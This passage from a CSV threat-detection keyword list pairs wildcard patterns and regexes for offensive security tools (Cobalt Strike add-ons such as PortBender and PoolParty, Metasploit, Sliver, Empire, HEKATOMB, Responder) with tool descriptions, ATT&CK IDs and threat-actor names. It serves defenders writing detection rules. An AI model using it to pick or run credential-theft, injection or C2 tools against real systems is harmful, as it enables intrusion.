Evasion","https://github.com/dobin/avred","1","0","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*poetry run bofhound*",".{0,1000}poetry\srun\sbofhound.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*poetry run hekatomb*",".{0,1000}poetry\srun\shekatomb.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","10","5","444","48","2024-05-01T06:31:37Z","2022-09-09T15:07:15Z" "*poetry run NetExec *",".{0,1000}poetry\srun\sNetExec\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*PointAndPrint.ps1*",".{0,1000}PointAndPrint\.ps1.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*poison_ivy_c2*",".{0,1000}poison_ivy_c2.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Poisoners-Session.log*",".{0,1000}Poisoners\-Session\.log.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*poisonivy_bof.*",".{0,1000}poisonivy_bof\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*poisontap*",".{0,1000}poisontap.{0,1000}","offensive_tool_keyword","poisontap","PoisonTap - siphons cookies. exposes internal router & installs web backdoor on locked computers","T1534.002 - T1059.001 - T1053.005 - T1564.001","TA0002 - TA0007 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/samyk/poisontap","1","0","N/A","N/A","10","6125","995","2018-11-26T16:50:44Z","2016-11-16T11:51:34Z" "*PoisonTendy.dll*",".{0,1000}PoisonTendy\.dll.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","1","N/A","10","2","151","27","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z" "*polenum *-protocols *",".{0,1000}polenum\s.{0,1000}\-protocols\s.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*polenum -h*",".{0,1000}polenum\s\-h.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*pony-02.aftxt*",".{0,1000}pony\-02\.aftxt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*PoolParty attack completed successfully*",".{0,1000}PoolParty\sattack\scompleted\ssuccessfully.{0,1000}","offensive_tool_keyword","Cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","9","3","282","37","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z" "*PoolParty attack completed successfully*",".{0,1000}PoolParty\sattack\scompleted\ssuccessfully.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*PoolParty.exe *",".{0,1000}PoolParty\.exe\s.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*PoolPartyBof *",".{0,1000}PoolPartyBof\s.{0,1000}","offensive_tool_keyword","Cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","9","3","282","37","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z" "*PoolPartyBof * HTTPSLocal*",".{0,1000}PoolPartyBof\s.{0,1000}\sHTTPSLocal.{0,1000}","offensive_tool_keyword","Cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","9","3","282","37","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z" "*PoolPartyBof.cna*",".{0,1000}PoolPartyBof\.cna.{0,1000}","offensive_tool_keyword","Cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","9","3","282","37","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z" "*PoolPartyBof-main*",".{0,1000}PoolPartyBof\-main.{0,1000}","offensive_tool_keyword","Cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","9","3","282","37","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z" "*PoolParty-main.zip*",".{0,1000}PoolParty\-main\.zip.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*PoolParty-PoolParty.zip*",".{0,1000}PoolParty\-PoolParty\.zip.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*pornhub.py*",".{0,1000}pornhub\.py.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","6663","755","2024-04-10T07:34:29Z","2020-06-25T23:03:02Z" "*port_forward_pivot.py*",".{0,1000}port_forward_pivot\.py.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*port_scanner_ip_obj.py*",".{0,1000}port_scanner_ip_obj\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1952","1596","2024-01-11T16:11:28Z","2021-01-07T16:11:52Z" "*port_scanner_regex.py*",".{0,1000}port_scanner_regex\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1952","1596","2024-01-11T16:11:28Z","2021-01-07T16:11:52Z" "*PortBender backdoor*",".{0,1000}PortBender\sbackdoor.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","0","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*PortBender redirect*",".{0,1000}PortBender\sredirect.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","0","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*PortBender.cna*",".{0,1000}PortBender\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*PortBender.cpp*",".{0,1000}PortBender\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*portbender.dll*",".{0,1000}portbender\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*PortBender.exe*",".{0,1000}PortBender\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*PortBender.h*",".{0,1000}PortBender\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*PortBender.sln*",".{0,1000}PortBender\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*PortBender.zip*",".{0,1000}PortBender\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*portfwd add ?l *-p *-r *",".{0,1000}portfwd\sadd\s\?l\s.{0,1000}\-p\s.{0,1000}\-r\s.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Port forwarding","10","10","N/A","N/A","N/A","N/A" "*portfwd add --bind *",".{0,1000}portfwd\sadd\s\-\-bind\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*portfwd add -r *",".{0,1000}portfwd\sadd\s\-r\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*Port-Scan.ps1*",".{0,1000}Port\-Scan\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*portscan.rc*",".{0,1000}portscan\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*portscan_result.cna*",".{0,1000}portscan_result\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 